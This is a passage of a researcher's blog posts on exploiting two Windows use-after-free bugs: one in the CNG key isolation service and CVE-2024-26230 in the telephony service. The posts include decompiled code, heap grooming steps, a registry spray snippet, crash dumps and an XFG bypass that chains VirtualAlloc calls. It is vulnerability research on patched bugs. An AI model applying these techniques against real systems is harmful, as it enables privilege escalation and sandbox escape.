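    memcpy(&arena[PROPERTY_UNITS], &neighbor_value, sizeof neighbor_value);
    arena[PROPERTY_UNITS + 4] = 0;                /* keeps the model in bounds */

    bytes = query_length_bytes(arena);
    extra = bytes - 2 * PROPERTY_UNITS;
    if (extra > sizeof *leaked)
        extra = sizeof *leaked;
    *leaked = 0;
    memcpy(leaked, &arena[PROPERTY_UNITS], extra);
    return bytes;
}
```

User-mode pointers on x64 have zero upper bytes, so in this model the scan stops at the top of the neighboring pointer and the whole value comes back to the caller.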

Exploitation stage

Now I have an out-of-bounds read that can leak the content of an adjacent object, and a use-after-free elevation of privilege that can call an arbitrary address if I control the freed buffer. It's time to chain the vulnerabilities.

I look back to the free buffer to find out what I need first:

v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( 
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));

If I control the freed buffer and have a useful address, I can place this address at offset 0x20 of the freed buffer. Two locations behind that address matter: offset 0x80 must hold a valid function address, and offset 0x118 must hold a pointer to another buffer.

The lsass process enables the XFG mitigation, so I couldn't use ROP in this exploit. But since I control the first parameter of the function, I can use LoadLibraryW to load a DLL from a controlled path. The goal is therefore to set offset 0x80 of the valid address to the address of LoadLibraryW and to make the pointer stored at offset 0x118 point to the payload DLL path.

As introduced in the previous section, the "Use Context" property is a good primitive object because I control its size and entire content, and I have an out-of-bounds read. So the question is: which object should be adjacent to my property object?

I reviewed all the objects in keyiso and found that the memory buffer object may be a useful target.

    v7 = SrvLookupAndReferenceProvider(hContext, hProvider, 0);
    [...]
    _InterlockedIncrement((volatile signed __int32 *)(v7 + 8));
    *(_QWORD *)Heap = v7; // ===========> [a]
    *((_QWORD *)Heap + 1) = v32;
    SrvAddMemoryBufferToList((__int64)hContext, (__int64)Heap);
    v26 = *((_QWORD *)Heap + 4);
    Heap = 0i64;
    *v15 = v26;

When a memory buffer is created, keyiso looks up the provider object and stores its pointer at offset 0x0 of the memory buffer [a]. So if I fill the property object with non-zero values and then query it, the read leaks the provider object address.

And of course, different objects have different sizes, so I don't need to worry about other object types disturbing the layout when I do heap feng shui.

Finally, I worked out the exploitation scenario as follows:

Spray provider objects and memory buffer objects. The provider objects are for the final stage of exploitation, and the memory buffers are for leaking a provider object address.

Free some memory buffer objects to make heap holes, then allocate a property with the same size as the memory buffer object so that it occupies one of the freed holes, and query the property to get the provider object address.

Free enough provider objects to make sure the leaked provider object is freed, then spray properties with the same size as the provider object to occupy the leaked provider object address. The LoadLibraryW address and the payload DLL path pointer should be stored at offset 0x80 and offset 0x118 of the fake provider object. Since I only have one leaked address, I place the payload DLL path at another offset in the property buffer and store that address at offset 0x118 of the property buffer.

Finally, I trigger the use after free with three different threads: Thread A allocates key objects, Thread B releases key objects, and Thread C allocates property objects with the same size as the key object, with a fake reference count and the leaked property address at offset 0x20 of the property buffer.

When the client wins the race, meaning the property object occupies the key object hole after the key object is freed in the SrvFreeKey function, lsass finally loads an arbitrary DLL, which results in an AppContainer sandbox escape.
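The pointer layout from the third step can be checked with a harmless model. Everything here is a sketch: the buffer size, the path offset 0x120, and the helper names are hypothetical, a 64-bit build is assumed, and a benign callback with a narrow string stands in for the real target function.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define FAKE_SIZE    0x200  /* hypothetical size of the sprayed buffer        */
#define OFF_FUNCTION 0x80   /* function pointer read by the indirect call     */
#define OFF_ARGUMENT 0x118  /* pointer passed as the first argument           */
#define OFF_PATH     0x120  /* hypothetical spare offset holding the path     */

typedef int64_t (*two_arg_fn)(void *first, void *second);

/* Fill `image` so that, once it lives at `base_address`, offset 0x118 points
 * back into the same buffer where the path string is stored. */
static bool build_fake_provider(uint8_t *image, uint64_t base_address,
                                uint64_t function_address, const char *path)
{
    uint64_t path_address = base_address + OFF_PATH;
    size_t path_size = strlen(path) + 1;

    if (path_size > FAKE_SIZE - OFF_PATH)
        return false;
    memset(image, 0x41, FAKE_SIZE);
    memcpy(image + OFF_FUNCTION, &function_address, sizeof function_address);
    memcpy(image + OFF_ARGUMENT, &path_address, sizeof path_address);
    memcpy(image + OFF_PATH, path, path_size);
    return true;
}

/* Model of the indirect call: fetch the function at +0x80 and its first
 * argument at +0x118, then call it. */
static int64_t dispatch_like_free_key(const uint8_t *provider, void *second)
{
    two_arg_fn fn;
    void *first;

    memcpy(&fn, provider + OFF_FUNCTION, sizeof fn);
    memcpy(&first, provider + OFF_ARGUMENT, sizeof first);
    return fn(first, second);
}

/* Benign stand-in callback: returns the length of the string it receives. */
static int64_t count_chars(void *first, void *second)
{
    (void)second;
    return (int64_t)strlen((const char *)first);
}
```

A single leaked address is enough because the path pointer at 0x118 is derived from the same base as the buffer itself.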

Patch

Microsoft patched the issue by adding lock functions between the key object's initialization and free.

Before:

[...]
  RtlLeaveCriticalSection(v5);
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
  {
    v17 = SrvFreeKey((PVOID)freebuffer);
    if ( v17 < 0 )
      DebugTraceError(
        (unsigned int)v17,
        "Status",
        "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
        700i64);
  }
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
  {
    v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))(
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));
[...]

After:

[...]
    RtlEnterCriticalSection(v8);
    v12 = *((_QWORD *)v9 + 2);
    if ( *(volatile signed __int64 **)(v12 + 8) != v9 + 2
      || (v13 = (volatile signed __int64 **)*((_QWORD *)v9 + 3), *v13 != v9 + 2) )
    {
      __fastfail(3u);
    }
    *v13 = (volatile signed __int64 *)v12;
    *(_QWORD *)(v12 + 8) = v13;
    if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
    {
      v14 = SrvFreeKey(v9);
      if ( v14 < 0 )
        DebugTraceError(
          (unsigned int)v14,
          "Status",
          "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
          705i64);
    }
    RtlLeaveCriticalSection(v8);
    if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
    {
      v15 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)v9 + 4) + 128i64))(
              *(_QWORD *)(*((_QWORD *)v9 + 4) + 280i64),
              *((_QWORD *)v9 + 5));
[...]

Thanks to @chompie1337, @DannyOdler and @cplearns2h4ck for the discussion. Even after the patch, there should still be a UAF after SrvFreeKey gets called, because SrvFreeKey must free the key object while a reference to it is still used after the function returns. However, it seems that function can never actually be called. This is weird code, and I don't know why Microsoft designed it this way, but after they added the lock between key object initialization and free, the UAF race condition was fixed.

A trick, the story of CVE-2024-26230

By: WHEREISK0SHL

10 April 2024 at 09:43

Author: k0shl of Cyber Kunlun

Summary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service that I reported, assigned CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is an RPC-based service that is not running by default, but it can be activated by invoking the StartServiceW API with normal user privileges.

There are only three functions in telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0, 
    [in]long arg_1, 
    [out]long *arg_2, 
    [in][string] wchar_t* arg_3, 
    [in][string] wchar_t* arg_4);

void ClientRequest(
    [in][context_handle] void* arg_0, 
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, 
    [in]long arg_2, 
    [in][out]long *arg_3);

void ClientDetach(
    [in][out][context_handle] void** arg_0);
}

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
[...]
if ( object )
      {
        *object = 0x474F4C44; // =====> [a]
        v38 = *(_QWORD *)(contexthandle + 184);
        *((_QWORD *)object + 10) = v38;
        if ( v38 )
          *(_QWORD *)(v38 + 72) = object;
        *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
        a2[8] = object[22];
      }
[...]
}

As the code above shows, the service stores the magic value 0x474F4C44 (GOLD) into the object [a] and inserts the object into the context handle object [b]. Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

    v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
    if ( v28
      && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
          *((_QWORD *)v28 + 1) == context_handle_object) ) // check whether the object belongs to the context handle object
    {

However, when the "GOLD" object is freed, the service doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDialogInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
[...]
v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only checks that the magic value equals 0x474f4c44; it does not check whether the object belongs to the context handle object
[...]
  // free the object
}
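The difference between the two checks can be shown with a toy handle table. This is a sketch, not the service's code: the table, the structure, and the function names are hypothetical, and only the magic value and the idea of comparing the owner come from the snippets above.

```c
#include <stddef.h>
#include <stdint.h>

#define MAGIC_GOLD 0x474F4C44u   /* the bytes 'G' 'O' 'L' 'D' */
#define TABLE_SIZE 8

typedef struct ObjectSketch {
    uint32_t magic;
    const void *owner;   /* context handle that created the object */
    int in_use;
} ObjectSketch;

static ObjectSketch g_table[TABLE_SIZE];

/* Insert an object and return its handle (the table index), or -1 if full. */
static int new_object(uint32_t magic, const void *owner)
{
    for (int i = 0; i < TABLE_SIZE; ++i) {
        if (!g_table[i].in_use) {
            g_table[i].magic = magic;
            g_table[i].owner = owner;
            g_table[i].in_use = 1;
            return i;
        }
    }
    return -1;
}

/* Look up by handle and compare only the magic value. */
static ObjectSketch *reference_object(int handle, uint32_t magic)
{
    if (handle < 0 || handle >= TABLE_SIZE || !g_table[handle].in_use)
        return NULL;
    return g_table[handle].magic == magic ? &g_table[handle] : NULL;
}

/* Free path in the style of the vulnerable code: magic check only. */
static int free_unchecked(int handle)
{
    ObjectSketch *obj = reference_object(handle, MAGIC_GOLD);
    if (obj == NULL)
        return 0;
    obj->in_use = 0;
    return 1;
}

/* Free path with the ownership comparison that other dispatchers perform. */
static int free_checked(int handle, const void *caller)
{
    ObjectSketch *obj = reference_object(handle, MAGIC_GOLD);
    if (obj == NULL || obj->owner != caller)
        return 0;
    obj->in_use = 0;
    return 1;
}
```

With two contexts, the checked variant refuses a free request from the context that does not own the object, while the unchecked variant lets any caller that knows the handle release it.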

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
[...]
 v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
[...]
case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
[...]

 if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
[...]
}

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
 r8=000000ec0f9bea30  r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e            cmp     dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP          RetAddr               Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295     tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc     tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809     tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6     RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935     RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4     RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4     RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27     RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e     RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea     RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51     RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58     KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03     ntdll!TppIopExecuteCallback+0x198

Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited, because I can control the timing of both freeing and using the object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So I need to check whether there is a suitable object in the telephony service. One small tip: I don't even need an "object". All I want is a memory allocation whose size and content I can both control.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
  {
    if ( !RegOpenKeyExW(
            phkResult,
            L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
            0,
            0x20019u,
            &hKey) )
    {
      GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
      RegCloseKey(hKey);
    }
    
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
  {
    [...]
  }
  else
  {
    v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
    v7 = (wchar_t *)v6;
    if ( v6 )
    {
      *(_WORD *)v6 = 34;
      LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
      [...]
  }

The dispatch function "TRequestMakeCall" first opens the HKCU root key [a] and invokes the GetPriorityList function [b] to obtain the "RequestMakeCall" key value. After checking the permissions on this key, I determined that it is fully controlled by the current user, meaning I can modify the key value. The function "GetPriorityList" first retrieves the type and size of the key value [c], then allocates a heap buffer [d] and reads the key value into it [e]. This implies that if I control the key value, I control both the size and the content of the heap allocation.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

Now that I have a suitable primitive, it's time to perform heap feng shui. Because I can control the timing of allocating, freeing, and using the object, it's easy to come up with a layout.

First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
Then, I free some of them to create holes using the "FreeDialogInstance" function.
Next, I allocate a worker "GOLD" object that will be used to trigger the use-after-free vulnerability.
After that, I free the worker object through the vulnerability. At this point, the worker context handle object still holds a dangling pointer to the worker object.
Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY key value with controlled content. Then, I trigger several key value allocations to make sure one of them occupies the hole left by the worker object.
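
The five steps above can be sketched with a toy allocator. This is only a model: the pool of equal-sized slots, the LIFO free list, and every name in it (ToyHeap, toy_alloc, toy_free, toy_feng_shui) are hypothetical and are not how the Windows heap or tapisrv is implemented. It only illustrates why a freed slot that is still referenced can end up holding attacker-chosen bytes.

```c
#include <assert.h>
#include <string.h>

/* Toy model only: equal-sized slots handed out from a LIFO free list. */
#define SLOT_COUNT 8
#define SLOT_SIZE  0x60   /* illustrative: a 0x5E-byte value plus a 2-byte prefix */

typedef struct {
    unsigned char data[SLOT_COUNT][SLOT_SIZE];
    int free_stack[SLOT_COUNT];  /* indices of free slots; the top is reused first */
    int free_top;
} ToyHeap;

void toy_init(ToyHeap *h) {
    memset(h, 0, sizeof *h);
    /* Push slots in reverse so that slot 0 is handed out first. */
    for (int i = 0; i < SLOT_COUNT; i++)
        h->free_stack[i] = SLOT_COUNT - 1 - i;
    h->free_top = SLOT_COUNT;
}

int toy_alloc(ToyHeap *h) {
    assert(h->free_top > 0);
    return h->free_stack[--h->free_top];
}

void toy_free(ToyHeap *h, int slot) {
    assert(h->free_top < SLOT_COUNT);
    h->free_stack[h->free_top++] = slot;
}

/* Walks the five steps and returns 1 if the controlled allocation lands in
 * the slot that the stale reference still points to. */
int toy_feng_shui(void) {
    ToyHeap h;
    int gold[6];
    toy_init(&h);

    for (int i = 0; i < 6; i++)        /* step 1: allocate many "GOLD" objects */
        gold[i] = toy_alloc(&h);
    toy_free(&h, gold[1]);             /* step 2: free some of them to make holes */
    toy_free(&h, gold[3]);

    int worker = toy_alloc(&h);        /* step 3: the worker object fills a hole */
    int dangling = worker;             /* the context handle keeps this reference */
    toy_free(&h, worker);              /* step 4: free the worker via the bug */

    int key_value = toy_alloc(&h);     /* step 5: controlled data reclaims the hole */
    memset(h.data[key_value], 0x41, SLOT_SIZE);

    return key_value == dangling && h.data[dangling][0] == 0x41;
}
```

In this model a single reclaiming allocation is enough because the free list is strictly LIFO. The real heap gives no such guarantee, which is presumably why the last step performs several key value allocations rather than one.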

XFG mitigation

After the final step of the heap feng shui in the previous section, the controlled key value buffer occupies the target hole. I then invoke the "TUISPIDLLCallback" function to trigger the "use" step. As the pseudocode above shows, the controlled buffer is the input buffer of the RPC interface. When I set the relevant field to 3, the function compares a magic value against the worker object and then fetches a virtual function address from the worker object, so I only need to place these two values in the content of the registry key value.

    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
    RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
    BYTE lpbuffer[0x5e] = { 0 };
    *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
    *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
    RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);
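
The offsets 0xE and 0x1E look odd until the 2-byte prefix written by GetPriorityList is taken into account. The sketch below is a portable model of that layout, not the exploit code: build_value, build_chunk, chunk_u32, and chunk_u64 are hypothetical helpers, and the conclusion that the object's fields sit at 0x10 and 0x20 is an inference from the arithmetic rather than something stated in the text. It assumes a little-endian target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define VALUE_SIZE  0x5E   /* cbData passed to RegSetValueExW above */
#define PREFIX_SIZE 2      /* the WORD 34 ('"') stored before the value data */
#define CHUNK_SIZE  (VALUE_SIZE + PREFIX_SIZE)

/* Fills the registry value the same way the snippet above does. */
void build_value(uint8_t value[VALUE_SIZE], uint32_t magic, uint64_t fake_ptr) {
    assert(value != NULL);
    memset(value, 0, VALUE_SIZE);
    memcpy(value + 0x0E, &magic, sizeof magic);
    memcpy(value + 0x1E, &fake_ptr, sizeof fake_ptr);
}

/* Models GetPriorityList: zeroed allocation, prefix WORD, then the raw value. */
void build_chunk(const uint8_t value[VALUE_SIZE], uint8_t chunk[CHUNK_SIZE]) {
    uint16_t quote = 34;
    assert(value != NULL && chunk != NULL);
    memset(chunk, 0, CHUNK_SIZE);      /* HeapAlloc flag 8 is HEAP_ZERO_MEMORY */
    memcpy(chunk, &quote, sizeof quote);
    memcpy(chunk + PREFIX_SIZE, value, VALUE_SIZE);
}

uint32_t chunk_u32(const uint8_t *chunk, size_t off) {
    uint32_t v;
    memcpy(&v, chunk + off, sizeof v);
    return v;
}

uint64_t chunk_u64(const uint8_t *chunk, size_t off) {
    uint64_t v;
    memcpy(&v, chunk + off, sizeof v);
    return v;
}
```

With the prefix included, a 0x5E-byte value produces a 0x60-byte allocation, the magic value ends up at offset 0x10 of the allocation, and the fake function pointer at offset 0x20.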

It seems that only one step is left to complete the exploitation. I control the address of the virtual function, which means I control the RIP register. Without the XFG mitigation, I could simply use ROP. However, XFG prevents RIP from jumping to a ROP gadget address and raises an INT 29 exception when the control flow check fails.

Last step, the true challenge

Just like the exploitation I introduced in my previous blog post, the exploitation of CNG key isolation, once I control RIP it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly ran into some challenges this time when I tried to set the virtual function address to the LoadLibrary address.

Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF

The first parameter is a DWORD value taken from the RPC input buffer, which the client controls.
The second parameter also comes from the RPC input buffer, but it must be a constant: it equals the case number I mentioned in the previous section, so it must be 3.
The third parameter is a pointer. "buffer" is the controlled buffer address plus 0x3C, and an additional offset taken from the controlled RPC input buffer is added to it.
The fourth parameter is a DWORD value taken from the controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load the payload DLL, and I need another way to complete the exploitation. At this point, I wanted to find a function that loads the payload DLL indirectly. Because the third parameter is a pointer whose content I control, I need a function that contains code like the following:

func(a1, a2, a3, ...){
[...]
    path = a3;
    LoadLibrary(path);
[...]
}

The limitation in this scenario is that I can't control which DLLs are loaded in the RPC server, so I can only use the DLLs that are already there. I spent some time looking for an eligible function, but failed to find one.

It seemed like I was back at the beginning. I reviewed some APIs on MSDN again, hoping to find another approach.

The trick

After some time, I remembered an interesting API: VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress. It can be set to a specific value, and the process will allocate memory at that address.

I noticed that I can allocate memory at a 32-bit address with this function!

The second parameter, the size of the region to allocate, is the constant value 3 in my scenario. That is not a problem for my purpose. The last parameter is a controlled DWORD value that serves as flProtect, so I can set it to PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario it's a pointer. This means the low 32 bits of the pointer are interpreted as flAllocationType, which I need to be MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000). Although I control the offset, I don't know the address of the pointer, so I can't set its low 32 bits to a chosen value. I tried allocating the heap with some random values, but every attempt failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
[...]
}
*controlledbuffer = result;
return result;

The return value of the virtual function is stored in the controlled buffer, which is then returned to the client. This means that if I call an allocation function such as MIDL_user_allocate, it returns a 64-bit address, but only the low 32 bits of that address are returned to the client. This is a useful information disclosure.
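
A minimal sketch of what this leak gives the client, assuming the result slot is 32 bits wide as described. The helper names and the sample addresses are hypothetical. The point is that the high half of the pointer is lost, which is acceptable here because only the low 32 bits matter for the DWORD-sized parameters.

```c
#include <assert.h>
#include <stdint.h>

/* Models `*controlledbuffer = result;` when the slot holds only 32 bits. */
uint32_t leaked_low32(uint64_t returned_pointer) {
    return (uint32_t)returned_pointer;
}

/* Two pointers that differ only in their high 32 bits look identical
 * to the client. */
int same_leak(uint64_t a, uint64_t b) {
    return leaked_low32(a) == leaked_low32(b);
}
```

For example, a hypothetical heap address of 0x00000203bd700000 would reach the client as 0xbd700000.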

But I still couldn't predict the low 32 bits of the third parameter when invoking VirtualAlloc. So I tried increasing the allocation size to see whether there was any regularity. In fact, the maximum input size that the RPC client can set is larger than 0x40000000, and when I set the allocation size to 0x40000000, I found an interesting situation.

When the allocation size is 0x40000000, the low 32 bits of the pointer increase linearly, which makes them predictable.

For example, if the leaked low 32 bits are 0xbd700000, I know that with an input buffer size of 0x40000000, the low 32 bits of the next controlled buffer will be 0xfd800000. Additionally, the offset added to the third parameter can't be larger than the input buffer size. Therefore, I need to make sure that the low 32 bits of the address are larger than 0xc0000000. That way, the sum of the address and the offset can exceed 0x100000000, its low 32 bits wrap around, and it becomes possible to set the low 32 bits of the third parameter to 0x3000 (MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000)).
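
The arithmetic in this example can be worked through in a few lines. This is a sketch under stated assumptions: the stride 0x40100000 is simply the difference between the two sample values above, the 0x3C header comes from the description of the third parameter, and the predicted value is taken to be the base of the controlled buffer. The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MEM_COMMIT_RESERVE 0x3000u      /* MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000) */
#define INPUT_SIZE         0x40000000u  /* RPC input buffer size used in the text */
#define DATA_OFFSET        0x3Cu        /* "buffer" is the controlled buffer + 0x3C */
#define OBSERVED_STRIDE    0x40100000u  /* assumption: 0xfd800000 - 0xbd700000 */

/* Predicts the low 32 bits of the next buffer from the leaked value. */
uint32_t predict_next_low32(uint32_t leaked) {
    return leaked + OBSERVED_STRIDE;    /* unsigned arithmetic wraps modulo 2^32 */
}

/* Finds the offset that makes the low 32 bits of (buffer + offset) equal
 * 0x3000. Returns 1 on success, 0 if the offset would exceed the input size. */
int solve_offset(uint32_t buf_low32, uint32_t *offset_out) {
    assert(offset_out != NULL);
    uint32_t data_low32 = buf_low32 + DATA_OFFSET;
    uint32_t offset = MEM_COMMIT_RESERVE - data_low32;  /* modulo 2^32 */
    if (offset > INPUT_SIZE)
        return 0;
    *offset_out = offset;
    return 1;
}
```

Under these assumptions, a buffer whose low 32 bits are 0xfd800000 needs an offset of 0x02802FC4, which fits inside the input buffer. A buffer at 0xbd700000 would need 0x42902FC4, which is larger than 0x40000000, and that is why the address has to be above 0xc0000000.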

To sum up so far: I perform the heap feng shui and control the entire content of the heap hole with the controllable registry key value. To bypass the XFG mitigation, I first leak the low 32 bits of the address by placing the MIDL_user_allocate function address in the key value, and then place the VirtualAlloc function address in the key value. Obviously, the exploit doesn't end once the 32-bit address is allocated, so I need to invoke "TUISPIDLLCallback" multiple times. The good news is that I control the timing of the "use" step, so all I need to do is free the registry key value heap, set a new key value with the next target function address, allocate a new key value heap, and trigger the use again.

tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000    call    qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700  jmp     qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc              int     3
